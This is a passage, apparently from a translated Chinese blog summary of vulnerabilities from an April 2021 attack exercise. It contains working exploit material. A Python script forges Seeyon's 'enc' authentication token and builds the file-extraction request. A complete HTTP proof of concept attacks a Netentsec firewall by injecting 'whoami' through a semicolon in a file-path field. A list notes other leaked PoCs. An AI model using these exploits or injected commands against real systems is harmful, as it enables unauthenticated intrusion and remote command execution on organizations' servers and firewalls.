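What the "special request" in the first step actually carries, as an added example that is not from the original post or from Seeyon: base64-decoding the enc value used above and moving every character down by one code point yields a readable L=...&M=...&T=... string, so the functions below implement exactly that transform (observed from the value itself; whether the server's own routine does anything more is not something the page shows). The last helper builds the ajax.do form body of the extraction step, reproducing the [0,"<date>","<fileid>"] arguments shape from the request above; the file id and date in the usage are the ones shown on the page.

```python
import base64
from urllib.parse import quote

# enc value from the thirdpartyController.do request above
PAGE_ENC = "TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4"


def decode_enc(enc: str) -> str:
    """base64-decode, then move every character down one code point.
    This is the transform observed on the page's value; nothing beyond that is assumed."""
    shifted = base64.b64decode(enc).decode("latin-1")
    return "".join(chr(ord(c) - 1) for c in shifted)


def encode_enc(plain: str) -> str:
    """Inverse of decode_enc: +1 per character, then base64."""
    shifted = "".join(chr(ord(c) + 1) for c in plain)
    return base64.b64encode(shifted.encode("latin-1")).decode("ascii")


def parse_enc_fields(enc: str) -> dict:
    """Split the decoded L=...&M=...&T=... string into a dict."""
    return dict(kv.split("=", 1) for kv in decode_enc(enc).split("&"))


def build_unzip_body(fileid: str, date_iso: str) -> str:
    """Form body for the ajax.do extraction call: arguments is the URL-encoded JSON array
    [0, "<yyyy-mm-dd>", "<fileid>"], matching the request shown above."""
    args = '[0,"%s","%s"]' % (date_iso, fileid)
    return ("method=ajaxAction&managerName=portalDesignerManager"
            "&managerMethod=uploadPageLayoutAttachment&arguments=" + quote(args, safe=""))


if __name__ == "__main__":
    print(decode_enc(PAGE_ENC))
    print(parse_enc_fields(PAGE_ENC))
    print(build_unzip_body("5818374431215601542", "2021-04-09"))
```

Because the transform is reversible with no secret, anyone who can reach thirdpartyController.do can mint an enc of their own; that, rather than the particular value on the page, is why the first step works without credentials.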

Netentsec (网康) next-generation firewall RCE
Point of interest

/directdata/direct/router

POC

POST /directdata/direct/router HTTP/1.1

Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
Other information
April 12, 14:00: a remote command execution vulnerability was newly found in the Tianqing (天擎) endpoint security management console; a PoC appears to have leaked
April 12, 12:00: a binary vulnerability was newly found in Xunlei (迅雷) 11
April 12, 12:00: the PHP "zerodium" backdoor vulnerability was reported; a PoC has leaked
April 12, 10:00: a fastjson 1.2.75 bypass RCE was reported; a PoC appears to have leaked

References: sources
https://www.freebuf.com/articles/268901.html http://www.hackdig.com/


Copyright: 三尺青锋
License: This work is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License.
From 《4.08后hw爆出漏洞及部分其他历史漏洞小结》 (Summary of vulnerabilities disclosed during HW after April 8 and some other historical vulnerabilities)